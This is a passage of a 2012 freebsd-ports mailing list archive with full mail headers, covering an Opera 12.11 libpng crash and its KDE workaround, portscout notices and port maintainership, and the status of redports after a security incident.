(Postfix) with ESMTP id 82FEC783 for ; Wed, 28 Nov 2012 16:45:58 +0000 (UTC) (envelope-from awarecons@gmail.com) Received: from mail-vb0-f54.google.com (mail-vb0-f54.google.com [209.85.212.54]) by mx1.freebsd.org (Postfix) with ESMTP id 28D008FC08 for ; Wed, 28 Nov 2012 16:45:57 +0000 (UTC) Received: by mail-vb0-f54.google.com with SMTP id l1so7003188vba.13 for ; Wed, 28 Nov 2012 08:45:57 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:date:message-id:subject:from:to:cc:content-type; bh=2xPCwezQ1D416e31UJd+q6ecnpwq0YibBPi8K3KuEYo=; b=1GHqm/V2UIhQSWH2xAo7/QF8Isu0s4ZZjc9TJs66ydM0YqDc0Cc5auVmX7WF9TKd2d +0JFlcTxl4IknmaMABP8RACTx5FZeK21HNw9mXeTR4R3p3QO5C2+JYYxlwA2bx5RZAdt q1NcBm/+hQURywYlqtDtlJhfsjfMPeT+D+FbspNLX0pqhyH4rd7kbNokjb5NjsYT+jBg amfyqCEyxfrW3e/oL8WlcaVU0Ph9UH1lCizEB1Iz9uaZEN4vcbaMsGQbSQopK9aSTbTx EgogSMzAJsOvMaZpLnYNRAi8+mQ32Spj1Az7M/rwT9DQ/5m42aZ0OjraX3K+WZPlklXk OLcA== MIME-Version: 1.0 Received: by 10.52.26.242 with SMTP id o18mr25843472vdg.90.1354121157227; Wed, 28 Nov 2012 08:45:57 -0800 (PST) Received: by 10.220.230.138 with HTTP; Wed, 28 Nov 2012 08:45:57 -0800 (PST) Date: Wed, 28 Nov 2012 20:45:57 +0400 Message-ID: Subject: Porting MyPhoneExplorer to FreeBSD/Linux From: awarecons To: fj.wechselberger@gmx.at Content-Type: text/plain; charset=ISO-8859-1 X-Content-Filtered-By: Mailman/MimeDel 2.1.14 Cc: ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 28 Nov 2012 16:45:58 -0000 Hello! Thank you for developing such a great&handy invent like MyPhoneExplorer ( http://www.fjsoft.at/en/index.php)! Could you take a challenge of porting it to FreeBSD (ports@freebsd.org), it would be nice! Thank you in advance. From owner-freebsd-ports@FreeBSD.ORG Wed Nov 28 16:57:49 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 5155990E for ; Wed, 28 Nov 2012 16:57:49 +0000 (UTC) (envelope-from kob6558@gmail.com) Received: from mail-lb0-f182.google.com (mail-lb0-f182.google.com [209.85.217.182]) by mx1.freebsd.org (Postfix) with ESMTP id BECB68FC12 for ; Wed, 28 Nov 2012 16:57:48 +0000 (UTC) Received: by mail-lb0-f182.google.com with SMTP id go10so10681550lbb.13 for ; Wed, 28 Nov 2012 08:57:47 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :cc:content-type; bh=xHrKoqD6PHoFmwVm+t/xVBhRTYtw+yguod9TqHSRhMk=; b=lUL86o5JEgwOlhrIQpnf8PgKbtVWA81beXCqkE0jf01k8W8oFdS6G6isA0XWuuLkcR HU0iSQSw5nB0Xg8C+wpfEGw0pF2DmJO6CE+VkVCG8qI3RougCUGTJWAPn0Uf0uZvao3P P1GTyKW/xZHJ8JiV/HTk7tVAXRx4g6dJHIzbwPrNxOHdcAjP71iKCpa4RS3cf3iSd2tW a/d+e6Fka9/pXHgb8747JSZ5jTI0iSqOBRQh2TUuL3LplDvjmM655JAsoKiNdnrh9Wdl kjqC+HX/QBfj/O5VwsHleVimAKpucopC9FlD+gncTL52pO3si6tGBrRMEowvMF63R7XP Xd2g== MIME-Version: 1.0 Received: by 10.112.30.137 with SMTP id s9mr8487811lbh.0.1354121867521; Wed, 28 Nov 2012 08:57:47 -0800 (PST) Received: by 10.112.54.146 with HTTP; Wed, 28 Nov 2012 08:57:47 -0800 (PST) In-Reply-To: References: <201211271554.qARFs9un067018@null.zi0r.com> <50B4E664.6030606@filez.com> <50B56392.9060506@ShaneWare.Biz> <31BBFCB108C82225ADF20511@utd71538.campus.ad.utdallas.edu> Date: Wed, 28 Nov 2012 08:57:47 -0800 Message-ID: Subject: Re: FreeBSD ports you maintain which are out of date From: Kevin Oberman To: Alexander Yerenkow Content-Type: text/plain; charset=UTF-8 Cc: ports@freebsd.org, Paul Schmehl , portscout@portscout.zi0r.com, Shane Ambler , Radim Kolar X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 28 Nov 2012 16:57:49 -0000 On Wed, Nov 28, 2012 at 7:45 AM, Alexander Yerenkow wrote: > In that case, near each port should be.mntr contact mentioned, to.make it > easier for anyone to contact mntr immediately, instead making additional > unnecessary steps. I suspect that you are missing the fact that all ports which lack a specific maintainer (most of them) are maintained by ports@. So the messages to ports are only for the vast array of ports that are unmaintained. There is no one else to contact. Ideally, if someone has a little free time, they can look at the list and pick a couple to update and submit the update in a PR to ports with a category of "update". Or even better, become the maintainer, yourself. I have been maintainer for a couple of ports that were critical to my work, so I could be sure that they would be updated promptly. -- R. Kevin Oberman, Network Engineer E-mail: kob6558@gmail.com From owner-freebsd-ports@FreeBSD.ORG Wed Nov 28 18:49:04 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 958152BC for ; Wed, 28 Nov 2012 18:49:04 +0000 (UTC) (envelope-from Mark.Martinec+freebsd@ijs.si) Received: from mail.ijs.si (mail.ijs.si [IPv6:2001:1470:ff80::25]) by mx1.freebsd.org (Postfix) with ESMTP id 0D75D8FC14 for ; Wed, 28 Nov 2012 18:49:03 +0000 (UTC) Received: from amavis-proxy-ori.ijs.si (localhost [IPv6:::1]) by mail.ijs.si (Postfix) with ESMTP id 3YBW9V4H2kzGMZJ for ; Wed, 28 Nov 2012 19:49:02 +0100 (CET) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/simple; d=ijs.si; h= message-id:content-transfer-encoding:content-type:content-type :mime-version:in-reply-to:references:user-agent:date:date :subject:subject:organization:from:from:received:received :received:vbr-info; s=jakla2; t=1354128541; x=1356720542; bh=Qjp DaqiikhEZOK40i0j1LSt0eIu+l8UUD7MqKcO30gc=; b=qkS3GhXKraIVC8ZNh/d CGV4v0vpy/9HJfIPh5cWM0QORdg5D9aB3B3AtowUxUwXoO/Wrr+5/JAUy/CVA3df 1Xt6DuK8qCIClLuJs6bsIXTOfXq9vETM8QNvDn1NlA817vrvOx+3wDJhHr/NY4gb UMI8xHs6y70Jse9EFiTugiNk= VBR-Info: md=ijs.si; mc=all; mv=dwl.spamhaus.org; X-Virus-Scanned: amavisd-new at ijs.si Received: from mail.ijs.si ([IPv6:::1]) by amavis-proxy-ori.ijs.si (mail.ijs.si [IPv6:::1]) (amavisd-new, port 10012) with ESMTP id 5weW92GQREHz for ; Wed, 28 Nov 2012 19:49:01 +0100 (CET) Received: from mildred.ijs.si (mailbox.ijs.si [IPv6:2001:1470:ff80::143:1]) by mail.ijs.si (Postfix) with ESMTP for ; Wed, 28 Nov 2012 19:49:01 +0100 (CET) Received: from neli.ijs.si (neli.ijs.si [IPv6:2001:1470:ff80:88:21c:c0ff:feb1:8c91]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (No client certificate requested) by mildred.ijs.si (Postfix) with ESMTPSA id 64981E2F for ; Wed, 28 Nov 2012 19:49:01 +0100 (CET) From: Mark Martinec Organization: J. Stefan Institute To: freebsd-ports@freebsd.org Subject: Re: opera 12.11 Date: Wed, 28 Nov 2012 19:49:00 +0100 User-Agent: KMail/1.13.7 (FreeBSD/9.1-PRERELEASE; KDE/4.8.4; amd64; ; ) References: <201211270534.31383.lumiwa@gmail.com> <201211271755.45804.lumiwa@gmail.com> <20121128095604.GC849@e-new.0x20.net> In-Reply-To: <20121128095604.GC849@e-new.0x20.net> MIME-Version: 1.0 Content-Type: Text/Plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Message-Id: <201211281949.00353.Mark.Martinec+freebsd@ijs.si> X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 28 Nov 2012 18:49:04 -0000 Mitja wrote: > Update to Opera 12.11 and Opera-Linuxplugins 12.11 from 12.10 on my FreeBSD > 9.1 RC-3 doen't works anymore: > > opera > libpng error: incorrect data check > libpng error: incorrect data check > libpng error: incorrect data check > Segmentation fault (core dumped) Same here (9.1-RC3 amd64): $ opera libpng error: incorrect data check Bus error: 10 > P.S. > I used Clang to build Opera. Not me, just a system's default cc: cc (GCC) 4.2.1 20070831 patched [FreeBSD] Also no CC-related settings in /etc/make.conf . Peter Ulrich Kruppa wrote: > It is quite a while since, but did you update your graphics/png properly? > Please check /usr/ports/UPDATING 20120531 . Yes, ports depending on graphics/png were rebuilt in July. Just in case, I fetched a fresh FreeBSD 9.1 from CVS and re-installed it: $ uname -a FreeBSD xxx 9.1-PRERELEASE FreeBSD 9.1-PRERELEASE #0: Wed Nov 28 16:58:36 CET 2012 mark@xxx:/usr/obj/usr/src/sys/XXX amd64 and re-did the "portmaster -r png-" as suggested in UPDATING (took a day, including qt4 and kde4), then re-installed www/opera. No change, still: libpng error: incorrect data check, Bus error Perhaps I should note that my opera is supposed to have several tabs open in the startup session. Kevin Oberman wrote: > Try "pkg_libchk -o". All clean, "pkg_libchk -o" is happy, everything else works fine. Mark From owner-freebsd-ports@FreeBSD.ORG Wed Nov 28 19:07:01 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id DBC096E2 for ; Wed, 28 Nov 2012 19:07:01 +0000 (UTC) (envelope-from yerenkow@gmail.com) Received: from mail-wg0-f50.google.com (mail-wg0-f50.google.com [74.125.82.50]) by mx1.freebsd.org (Postfix) with ESMTP id 601CB8FC0C for ; Wed, 28 Nov 2012 19:07:01 +0000 (UTC) Received: by mail-wg0-f50.google.com with SMTP id 12so1742858wgh.31 for ; Wed, 28 Nov 2012 11:06:59 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :cc:content-type; bh=PeTbRoJKVBs7bo8e9gbQRYa/0wz3Y99MWUMzq/sQSwQ=; b=y0NKmv9KiB+ygnsPtZftC2Idx80NOI4D1IBavwdFVmW9flVseYLYzPPOT7hyIhzSGZ GoOiOTUnMbLLtYcrj5HN2CODX4Phqf2cN3dGwDTZbMp9ZrFijJj0RWJYO85NcZZEPoUZ t9JnWHqq01n3EQKUUYzzQrlmgodb3WVa2Fnx8PVFiZQiqnfO9BExitl0yyhy2SDQ4zjY MBMT7tCS+dfGU9QjFBoXiN6RrZW94+9bDU3kQps5mU2rExmmZ/OflRqc22Kc+kBj/k8w yuWW2ARihlzR9wMO9OITRMF1VJdCZ85polgfgdFxcUtGcTX396ZwjVS4TfaBSn+88Fsd UYzQ== MIME-Version: 1.0 Received: by 10.180.78.161 with SMTP id c1mr31334900wix.4.1354129619587; Wed, 28 Nov 2012 11:06:59 -0800 (PST) Received: by 10.194.40.131 with HTTP; Wed, 28 Nov 2012 11:06:59 -0800 (PST) In-Reply-To: References: <201211271554.qARFs9un067018@null.zi0r.com> <50B4E664.6030606@filez.com> <50B56392.9060506@ShaneWare.Biz> <31BBFCB108C82225ADF20511@utd71538.campus.ad.utdallas.edu> Date: Wed, 28 Nov 2012 21:06:59 +0200 Message-ID: Subject: Re: FreeBSD ports you maintain which are out of date From: Alexander Yerenkow To: Kevin Oberman Content-Type: text/plain; charset=ISO-8859-1 X-Content-Filtered-By: Mailman/MimeDel 2.1.14 Cc: ports@freebsd.org, Paul Schmehl , portscout@portscout.zi0r.com, Shane Ambler , Radim Kolar X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 28 Nov 2012 19:07:02 -0000 2012/11/28 Kevin Oberman > On Wed, Nov 28, 2012 at 7:45 AM, Alexander Yerenkow > wrote: > > In that case, near each port should be.mntr contact mentioned, to.make it > > easier for anyone to contact mntr immediately, instead making additional > > unnecessary steps. > > I suspect that you are missing the fact that all ports which lack a > specific maintainer (most of them) are maintained by ports@. So the > messages to ports are only for the vast array of ports that are > unmaintained. There is no one else to contact. > > Ideally, if someone has a little free time, they can look at the list > and pick a couple to update and submit the update in a PR to ports > with a category of "update". Or even better, become the maintainer, > yourself. I have been maintainer for a couple of ports that were > critical to my work, so I could be sure that they would be updated > promptly. > Not exactly :) My suggestion about including current maintainer contact info was about this part of discussion: >>Probably more to the point is that it shouldn't get sent to the ports >>mailing list - just to port maintainers. >Did you ever think that sending it to the list might motivate someone else to take over the port? >There's a reason ports get out of date. One of the reasons is because the port maintainer has lost interest or no longer has the time. If people on the list see it, someone who is motivated might update the >port and end up being its new maintainer. So, my thought was, if you ever came to sending portscout messages with alive maintainer to all ports@ list, would be nice to see contacts immediately. You could learn that some maintainer is inactive last time, and next time you see update for his port, you could get it to work. Something like that. > -- > R. Kevin Oberman, Network Engineer > E-mail: kob6558@gmail.com > -- Regards, Alexander Yerenkow From owner-freebsd-ports@FreeBSD.ORG Wed Nov 28 20:29:40 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 86846A4A for ; Wed, 28 Nov 2012 20:29:40 +0000 (UTC) (envelope-from ronald-freebsd8@klop.yi.org) Received: from cpsmtpb-ews06.kpnxchange.com (cpsmtpb-ews06.kpnxchange.com [213.75.39.9]) by mx1.freebsd.org (Postfix) with ESMTP id 110DB8FC12 for ; Wed, 28 Nov 2012 20:29:39 +0000 (UTC) Received: from cpsps-ews24.kpnxchange.com ([10.94.84.190]) by cpsmtpb-ews06.kpnxchange.com with Microsoft SMTPSVC(7.5.7601.17514); Wed, 28 Nov 2012 21:27:49 +0100 Received: from CPSMTPM-TLF103.kpnxchange.com ([195.121.3.6]) by cpsps-ews24.kpnxchange.com with Microsoft SMTPSVC(7.5.7601.17514); Wed, 28 Nov 2012 21:27:49 +0100 Received: from sjakie.klop.ws ([212.182.167.131]) by CPSMTPM-TLF103.kpnxchange.com with Microsoft SMTPSVC(7.5.7601.17514); Wed, 28 Nov 2012 21:28:31 +0100 Received: from 212-182-167-131.ip.telfort.nl (localhost [127.0.0.1]) by sjakie.klop.ws (Postfix) with ESMTP id E9CFC3A43 for ; Wed, 28 Nov 2012 21:28:30 +0100 (CET) Content-Type: text/plain; charset=us-ascii; format=flowed; delsp=yes To: freebsd-ports@freebsd.org Date: Wed, 28 Nov 2012 21:28:30 +0100 Subject: opera 12.11 libpng error MIME-Version: 1.0 Content-Transfer-Encoding: 8bit From: "Ronald Klop" Message-ID: User-Agent: Opera Mail/12.11 (FreeBSD) X-OriginalArrivalTime: 28 Nov 2012 20:28:31.0974 (UTC) FILETIME=[EEE32060:01CDCDA6] X-RcptDomain: freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 28 Nov 2012 20:29:40 -0000 Hi, I have the same libpng error when starting Opera 12.11 as already mentioned on this list. I happen to run KDE and ktrace shows me it crashes while reading icons like /usr/local/kde4/share/icons/oxygen/64x64/mimetypes/unknown.png. After renaming these icons so Opera does not find them it still prints 'libpng error: incorrect data check' but does not crash anymore. If I start without KDE integration there is no error anymore. You can do this by adding Dialog Toolkit=4 to the [File Selector] part of your opera*.ini. http://de.opera.com/support/usingopera/operaini/#file_selector Not an ideal solution, but at least I can read my e-mail again in Opera. Cheers, Ronald. From owner-freebsd-ports@FreeBSD.ORG Wed Nov 28 22:07:34 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 56DF391C for ; Wed, 28 Nov 2012 22:07:34 +0000 (UTC) (envelope-from itetcu@FreeBSD.org) Received: from mx.tetcu.info (mx.tetcu.info [217.19.15.179]) by mx1.freebsd.org (Postfix) with ESMTP id 0E0F08FC18 for ; Wed, 28 Nov 2012 22:07:33 +0000 (UTC) Received: from it.tim.tetcu.info (unknown [188.27.98.5]) (using TLSv1 with cipher DHE-RSA-AES128-SHA (128/128 bits)) (No client certificate requested) by mx.tetcu.info (Postfix) with ESMTPSA id 9AF60293B54; Wed, 28 Nov 2012 23:57:45 +0200 (EET) Date: Wed, 28 Nov 2012 23:57:44 +0200 From: Ion-Mihai Tetcu To: "Ronald Klop" Subject: Re: opera 12.11 libpng error Message-ID: <20121128235744.436a679f@it.tim.tetcu.info> In-Reply-To: References: X-Mailer: Claws Mail 3.8.1 (GTK+ 2.24.6; amd64-portbld-freebsd9.0) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Cc: freebsd-ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 28 Nov 2012 22:07:34 -0000 On Wed, 28 Nov 2012 21:28:30 +0100 "Ronald Klop" wrote: > Hi, > > I have the same libpng error when starting Opera 12.11 as already > mentioned on this list. I happen to run KDE and ktrace shows me it > crashes while reading icons like > /usr/local/kde4/share/icons/oxygen/64x64/mimetypes/unknown.png. > After renaming these icons so Opera does not find them it still > prints 'libpng error: incorrect data check' but does not crash > anymore. If I start without KDE integration there is no error anymore. > You can do this by adding Dialog Toolkit=4 to the [File Selector] > part of your opera*.ini. > http://de.opera.com/support/usingopera/operaini/#file_selector > > Not an ideal solution, but at least I can read my e-mail again in > Opera. I've added a note in UPDATING for this, thank you! -- IOnut - Un^d^dregistered ;) FreeBSD "user" "Intellectual Property" is nowhere near as valuable as "Intellect" FreeBSD committer -> itetcu@FreeBSD.org, PGP Key ID F0808380 From owner-freebsd-ports@FreeBSD.ORG Wed Nov 28 23:21:46 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 696D09C4; Wed, 28 Nov 2012 23:21:46 +0000 (UTC) (envelope-from lumiwa@gmail.com) Received: from mail-ie0-f182.google.com (mail-ie0-f182.google.com [209.85.223.182]) by mx1.freebsd.org (Postfix) with ESMTP id 1BA568FC14; Wed, 28 Nov 2012 23:21:45 +0000 (UTC) Received: by mail-ie0-f182.google.com with SMTP id s9so18492185iec.13 for ; Wed, 28 Nov 2012 15:21:45 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=from:to:subject:date:user-agent:cc:references:in-reply-to :mime-version:content-type:content-transfer-encoding:message-id; bh=zfrPnEJGXAgZlJK6CirHOI1Y2q3KcLZ9OxONISLaWbk=; b=EKyEcBZNg8W5AHK62MXdUjy4ZTH2KFmV1HGopu8EozZBzAUM2Il3MxxBuBY392p2Ru fJyLjkrkILPR+3VnNy7hnwOVZtpwqYyVocIUQfqLfiGycin1NYu3bUJS1XlqADa+vZ1J ddpPWh+SOkKRYjY4CsyHsTt8+t9v1Zoopi2dsIrqA3A/hdqUHexSAluq06LmwSnhly+n oaac59LDfjz+Xo27ICW5HutQSXUJXHNh9Z5KS4EVuW++W+nKVuj1mmWZ2hwUj9+1UUvE ts/SkYM09Ka7xXY7I2V9YFEt+PafPbu50Br7akOIt1ANFQOIkdPXN+rursjSUnvD8w67 d9WQ== Received: by 10.50.220.166 with SMTP id px6mr23445473igc.8.1354144905187; Wed, 28 Nov 2012 15:21:45 -0800 (PST) Received: from luna.wi.rr.com (cpe-184-58-138-79.wi.res.rr.com. [184.58.138.79]) by mx.google.com with ESMTPS id s3sm6082159igb.14.2012.11.28.15.21.43 (version=TLSv1/SSLv3 cipher=OTHER); Wed, 28 Nov 2012 15:21:44 -0800 (PST) From: ajtiM To: freebsd-ports@freebsd.org Subject: Re: opera 12.11 libpng error Date: Wed, 28 Nov 2012 17:21:33 -0600 User-Agent: KMail/1.13.7 (FreeBSD/9.1-RC3; KDE/4.8.4; i386; ; ) References: <20121128235744.436a679f@it.tim.tetcu.info> In-Reply-To: <20121128235744.436a679f@it.tim.tetcu.info> MIME-Version: 1.0 Content-Type: Text/Plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Message-Id: <201211281721.33934.lumiwa@gmail.com> Cc: Ion-Mihai Tetcu , Ronald Klop X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 28 Nov 2012 23:21:46 -0000 On Wednesday 28 November 2012 15:57:44 Ion-Mihai Tetcu wrote: > On Wed, 28 Nov 2012 21:28:30 +0100 > > "Ronald Klop" wrote: > > Hi, > > > > I have the same libpng error when starting Opera 12.11 as already > > mentioned on this list. I happen to run KDE and ktrace shows me it > > crashes while reading icons like > > /usr/local/kde4/share/icons/oxygen/64x64/mimetypes/unknown.png. > > After renaming these icons so Opera does not find them it still > > prints 'libpng error: incorrect data check' but does not crash > > anymore. If I start without KDE integration there is no error anymore. > > You can do this by adding Dialog Toolkit=4 to the [File Selector] > > part of your opera*.ini. > > http://de.opera.com/support/usingopera/operaini/#file_selector > > > > Not an ideal solution, but at least I can read my e-mail again in > > Opera. > > I've added a note in UPDATING for this, thank you! Thank you very much for help... It works now but Opera is not as before. It crashed on many sites (also at work on my Mac), I cannot upload pictures on Redbubble (Xombrero or Konqueror are much better). I hope Opera 12.12 would be better.... Thank you to everyone for the help again... Mitja -------- http://www.redbubble.com/people/lumiwa From owner-freebsd-ports@FreeBSD.ORG Thu Nov 29 00:17:26 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id D77FDDB3 for ; Thu, 29 Nov 2012 00:17:26 +0000 (UTC) (envelope-from hsn@filez.com) Received: from ponto.amerinoc.com (ponto.amerinoc.com [64.6.108.239]) by mx1.freebsd.org (Postfix) with ESMTP id 97DA78FC08 for ; Thu, 29 Nov 2012 00:17:26 +0000 (UTC) Received: from fbsd9.localdomain (205.83.broadband7.iol.cz [88.102.83.205]) (authenticated bits=128) by ponto.amerinoc.com (8.14.5/8.14.5) with ESMTP id qAT0HGiZ072736 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO) for ; Thu, 29 Nov 2012 01:17:19 +0100 (CET) (envelope-from hsn@filez.com) Received: from [127.0.0.1] ([10.0.0.1]) by fbsd9.localdomain (8.14.5/8.14.5) with ESMTP id qAT0HAMq001320 for ; Thu, 29 Nov 2012 01:17:10 +0100 (CET) (envelope-from hsn@filez.com) Message-ID: <50B5873E.80903@filez.com> Date: Wed, 28 Nov 2012 04:38:38 +0100 From: Radim Kolar User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/17.0 Thunderbird/17.0 MIME-Version: 1.0 To: freebsd-ports@freebsd.org Subject: Re: FreeBSD ports you maintain which are out of date References: <201211271554.qARFs9un067018@null.zi0r.com> <50B4E664.6030606@filez.com> <50B562D0.6070700@shatow.net> In-Reply-To: <50B562D0.6070700@shatow.net> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Antivirus: avast! (VPS 121128-1, 28.11.2012), Outbound message X-Antivirus-Status: Clean X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 29 Nov 2012 00:17:26 -0000 its spam sent from portscout@portscout.zi0r.com undeliverable address. Other reports are not sent daily. From owner-freebsd-ports@FreeBSD.ORG Thu Nov 29 03:11:14 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id CF04D501 for ; Thu, 29 Nov 2012 03:11:14 +0000 (UTC) (envelope-from meta@vmeta.jp) Received: from glory.vmeta.jp (7c293911.i-revonet.jp [124.41.57.17]) by mx1.freebsd.org (Postfix) with ESMTP id 9243C8FC0C for ; Thu, 29 Nov 2012 03:11:13 +0000 (UTC) Received: from ssl.vmeta.jp (localhost [127.0.0.1]) by glory.vmeta.jp (Postfix) with ESMTP id 3E6B8F9E; Thu, 29 Nov 2012 12:11:06 +0900 (JST) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 8bit Date: Thu, 29 Nov 2012 12:11:06 +0900 From: meta To: =?UTF-8?Q?Bernhard_Fr=C3=B6hlich?= Subject: Re: The state of redports In-Reply-To: <1353998149.27699.2.camel@Nokia-N900-42-11> References: <50A6DD25.6060105@ShaneWare.Biz> <078404971eaefd202c78c036e6982656@vmeta.jp> <1353998149.27699.2.camel@Nokia-N900-42-11> Message-ID: <4c3888b9ccaaf6c4082961a37fd8cbe0@vmeta.jp> X-Sender: meta@vmeta.jp User-Agent: Roundcube Webmail/0.8.4 Cc: freebsd-ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 29 Nov 2012 03:11:14 -0000 Thank your for the information. I'm looking forward to opening redports again. I thank all people who are working on the issue. 2012-11-27 15:35 ã« Bernhard Fröhlich ã•ã‚“ã¯æ›¸ãã¾ã—ãŸ: > On Di., 27. Nov. 2012 04:38:39 CET, meta wrote: > >> I know the work continues on rebuilding infrastructure. >> Is priority low to reopen redports than other infrastructure? > > The bottleneck right now are people that can do the security audit > and verify carefully which machines are safe and which we need to > setup from scratch. > >> Could anybody tell me when redports will be back? >> In a few days? weeks? months? or almost a year? > > I honestly don't know and I'm unable to make an educated guess so all > I can do is to inform people once I have some news. But we are surely > talking about days or weeks because otherwise I'll reactivate my box > in the basement ... > > Sorry that this incident knocked redports down for such a long time. > Redports still isn't critical enough to the project that it gets > dealt > with immediately so the plan is clear. We need to provide services to > the src people and something nice for cluster admins, security teams > and core to make them feel the pain like we do when redports is > offline. -- `whois vmeta.jp | nkf -w` meta From owner-freebsd-ports@FreeBSD.ORG Thu Nov 29 04:22:41 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 84B96257 for ; Thu, 29 Nov 2012 04:22:41 +0000 (UTC) (envelope-from jeffreybouquet@yahoo.com) Received: from nm28-vm7.bullet.mail.gq1.yahoo.com (nm28-vm7.bullet.mail.gq1.yahoo.com [98.136.216.166]) by mx1.freebsd.org (Postfix) with ESMTP id 178E78FC08 for ; Thu, 29 Nov 2012 04:22:40 +0000 (UTC) Received: from [98.137.12.189] by nm28.bullet.mail.gq1.yahoo.com with NNFMP; 29 Nov 2012 04:20:42 -0000 Received: from [98.137.12.207] by tm10.bullet.mail.gq1.yahoo.com with NNFMP; 29 Nov 2012 04:20:42 -0000 Received: from [127.0.0.1] by omp1015.mail.gq1.yahoo.com with NNFMP; 29 Nov 2012 04:20:42 -0000 X-Yahoo-Newman-Property: ymail-3 X-Yahoo-Newman-Id: 161944.92437.bm@omp1015.mail.gq1.yahoo.com Received: (qmail 71716 invoked by uid 60001); 29 Nov 2012 04:20:42 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s1024; t=1354162842; bh=DcqOFsiz9k5T05pkAoy0M2nNPOOyB3h69velHSBWY+E=; h=X-YMail-OSG:Received:X-Rocket-MIMEInfo:X-Mailer:Message-ID:Date:From:Subject:To:MIME-Version:Content-Type; b=1D0I2YSD6AMZNxHocq7RKXhdcodi1FfoQjxU48ncKdCiwgYyEc026U2FU3ZvSdVP0iD+4PwCrj8vuj7IEqm9xP1+7eVQjUe0KhqYJQiAsIykVTV2UhNdIPsU2Y+n0Wj1EcXQ6nuVxDqPkgH4lBEARlrksX1/WlMXWJS8z5BxLto= DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=X-YMail-OSG:Received:X-Rocket-MIMEInfo:X-Mailer:Message-ID:Date:From:Subject:To:MIME-Version:Content-Type; 